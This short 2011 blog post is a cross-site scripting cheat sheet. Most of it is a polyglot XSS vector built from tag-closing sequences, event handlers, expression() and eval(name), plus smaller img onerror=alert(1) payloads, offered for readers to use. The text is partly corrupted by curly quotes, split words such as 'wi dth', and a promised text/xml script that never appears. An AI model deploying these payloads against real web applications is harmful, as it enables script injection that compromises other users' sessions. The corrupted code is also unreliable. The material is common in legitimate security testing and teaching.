Tag Archives: cross site scripting cheat sheet

XSS Cheat sheet

Best xss vector: If you know there is an XSS and if you are unable to identify the exact code which pop-ups the alert message, then use this vector.

javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”> [img=1]<img -/style=-=expression&#40/*’/-/*’,/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>””/>
<img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>

When content type is text/xml, use the below script.



Posted by on February 2, 2011 in web application hacking, Xss


Tags: , , ,